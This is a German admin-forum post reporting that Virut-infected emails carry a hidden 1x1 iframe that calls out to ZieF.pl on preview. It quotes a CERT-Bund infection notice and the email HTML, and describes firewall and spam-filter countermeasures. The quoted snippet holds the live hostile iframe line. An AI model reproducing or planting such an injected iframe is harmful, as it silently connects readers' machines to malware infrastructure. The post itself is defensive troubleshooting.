Schadcode "Virut" IFRAME Exploit in Emails öffnen Rückkanal zu infektiösen Seiten

  • Guten Tag,


    jetzt veröffentliche ich den Scheiss der mich seit Wochen beschäftigt:


    Es scheint als wenn der David Code anfällig wäre für einen von VIRUT Botnetz verursachten Schadcode der sich in gewisse Emails einbettet.


    die Command und Control Server sind schon vom BSI unter Kontrolle gebracht worden , was aber nicht daran hindert den Rückkanal aufzubauen.


    Es bettet sich in bestimmte emails ein Iframe Code ein , der schon bei Mouseover einen Rückkanal Öffnet:



    Siehe Attachment 1



    Am Anfang hat der Iframe exploit es geschafft einen Rückkanal zu der entsprechenden Adresse "nur durch Mouseover" zu Öffnen

    und dazu geführt das dass Bundesamt für Sicherheit in der Informationstechnik auf uns "aufmerksam" wurde und uns eine schlechte Reputation gegeben hat.


    Sogar unser Provider wurde kontaktiert, das wir angeblich "infiziert" sind:



    Betreff: [CB-Report#20181027-10002XXX9] Schadprogramm-Infektionen in AS61430



    [English version below]Sehr geehrte Damen und Herren,CERT-Bund hat aus vertrauenswürdigen externen Quellen Informationenzu IP-Adressen in Deutschland erhalten, unter denen sich mit hoherWahrscheinlichkeit Systeme befinden, welche mit einem Schadprogramminfiziert sind.Nachfolgend senden wir Ihnen eine Liste betroffener Systemein Ihrem Netzbereich. Neben der IP-Adresse des betroffenen Systems,Zeitstempel (UTC) und Bezeichnung der Schadprogramm-Familie sind jeweils(soweit uns diese Daten vorliegen) Quell-Port, Ziel-IP-Adresse, Ziel-Port,Ziel-Hostname und Protokoll zu der Verbindung angegeben, die vermutlichvon einem Schadprogramm ausgelöst wurde, um Kontakt zu einemKontrollserver aufzunehmen.Die meisten der hier gemeldeten Schadprogramme verfügen über Funktionenzum Identitätsdiebstahl (Ausspähen von Benutzernamen und Passwörtern)und/oder zur Manipulation der Kommunikation beim Online-Banking.Wir möchten Sie bitten, den Sachverhalt zu prüfen und entsprechendeMaßnahmen zur Bereinigung der Systeme einzuleiten bzw. Ihre Kundenzu informieren.Weitere Informationen zu dieser Benachrichtigung finden Sie unter:<https://reports.cert-bund.de/schadprogramme>Diese E-Mail ist mittels PGP digital signiert.Informationen zu dem verwendeten Schlüssel finden Sie unter:<https://reports.cert-bund.de/digitale-signatur>Bitte beachten Sie:Dies ist eine automatisch generierte Nachricht. Antworten an dieAbsenderadresse <reports@reports.cert-bund.de> werden NICHT gelesenund automatisch verworfen. Bei Rückfragen wenden Sie sich bitteunter Beibehaltung der Ticketnummer [CB-Report#...] in derBetreffzeile an <certbund@bsi.bund.de>.!! Bitte lesen Sie zunächst unsere HOWTOs und FAQ, welche unter!! <https://reports.cert-bund.de/> verfügbar sind.--------------------------------------------------------------------------------Dear Sir or Madam,from trusted external sources, CERT-Bund received information onIP addresses geolocated in Germany which are most likely hostinga system infected with malware.Please find below a list of affected systems on yournetwork. Each record includes the IP address of the affected system,a timestamp (UTC) and the name of the related malware family.If available, the record also includes the source port, destination IP,destination port and destination hostname for the connection mostlikely triggered by the malware to connect to a command-and-controlserver.Most of the malware families reported here include functions foridentity theft (harvesting of usernames and passwords) and/oronline-banking fraud.We would like to ask you to check the issues reported and to takeappropriate steps to get the infected hosts cleaned up or notifyyour customers accordingly.Additional information on this notification is available at:<https://reports.cert-bund.de/en/malware>This message is digitally signed using PGP.Information on the signature key is available at:<https://reports.cert-bund.de/en/digital-signature>Please note:This is an automatically generated message. Replies to thesender address <reports@reports.cert-bund.de> will NOT be readbut silently be discarded. In case of questions, please contact<certbund@bsi.bund.de> and keep the ticket number [CB-Report#...]of this message in the subject line.!! Please make sure to consult our HOWTOs and FAQ available at!! <https://reports.cert-bund.de/en/> first.--------------------------------------------------------------------------------Bitte teilen Sie uns an <certbund@bsi.bund.de> mit, wenn Sie die Datenzu betroffenen Systemen als Dateianhang statt inline erhalten möchten.Please let us know at <certbund@bsi.bund.de> if you would like to receivethe data on affected systems as a file attachment instead of inline.--------------------------------------------------------------------------------Betroffene Systeme in Ihrem Netzbereich:Affected hosts on your networks:"asn","ip","timestamp","malware","src_port","dst_ip","dst_port","dst_host","proto""61430","185.126.XXX.XXX","2018-10-26 09:12:55","virut","54675","148.81.111.121","80","",""Mit freundlichen Grüßen / Kind regardsTeam CERT-BundBundesamt für Sicherheit in der InformationstechnikFederal Office for Information Security (BSI)Referat CK22 - CERT-BundGodesberger Allee 185-189, 53175 Bonn, Germany


    Das einzige was wir machen konnten ist die Factory zu Informieren , aber die Raffen es nicht. Es scheint als spreche man mit dämlichen NPCs

    Wir haben in der Firmenfirewall die Adresse direkt gesperrt sodaß kein aktiver Kanal mehr geöffnet werden kann, was aber das Problem an sich nicht löst. Jeder andere könnte auf gleiche Art und Weise , es ausnutzen.


    Uns zwar befindet sich zwischen den Zeilen ein malformed IFRAME der eine Grafik oder was auch immer versucht in die Zeilen einzubetten:


    Zitat

    No.9 xxxxxxxxxxxxxxxxxxxxxxxone,</span><br style="font-size: 16px;"><span style="font-size: 16px;">Yongkang&nbsp;<span data="321300" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">321300</span>, XXXXXXX, China</span><br style="font-size: 16px;"><span style="font-size: 16px;">Mob:<span data="0086-0000000000000" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">0086-18358959935</span></span><div style="font-size: 16px;">Tel:<span data="xxxxxxxxxxxxx93" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">0086-579-0000000000</span><br>Fax:<span data="0086-579-87294002" t="7" isout="1" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; position: static; z-index: 1;">0086-579-87294002</span><br></div></div><div><a href="http://www.xxxxxxxxxx.com/" target="_blank" style="font-size: 16px; font-family: Calibri; line-height: 22px; background-color: window; text-decoration: none !important;">http://www.xxxxxxxxxxxxx.com</a></div><iframe src="http://ZieF.pl/rc/" width="1" height="1" style="border:0"></iframe>

    </div></span></div>

    <blockquote style="margin-top: 0px; margin-bottom: 0px; margin-left: 0.5em;"><div>&nbsp;</div><div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm"><div style="PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-SIZE: 12px;FONT-FAMILY:tahoma;COLOR:#000000; BACKGROUND: #efefef; PADDING-BOTTOM: 8px; PADDING-TOP: 8px"><div><b>From:</b>&nbsp;<a


    Ich habe schon versucht nach und nach alle Dienste der Vorschau zu deaktivieren aber immernoch ohne Ergebnis. Hat jemandnoch eine Idee?


    David kann alle EMails die den "Zief" Code beinhalten rausfilter und löschen durch Globale Spam Regel: Nicht erlaubter Inhalt: ZieF.pl


    Danach nehme ich alle vorhandenen Emails mit dem Code und wandele diese in reine Text Form um... aber es sind hunderte

    09-f9-11-02-9d-74-e3-5b
    MfG Kingcopy seit C16 / C64
    Fachinformatiker / Systemintegration
    IT-Systemadministrator
    David (R) 2017 / 20 User / 100 GB
    David (R) 2017 / 150 User / 900 GB
    David FX 2011 / 5 User / 15 GB
    d8-41-56-c5-63-56-88-c0
    [/size]

    Dieser Beitrag wurde bereits 1 Mal editiert, zuletzt von kingcopy ()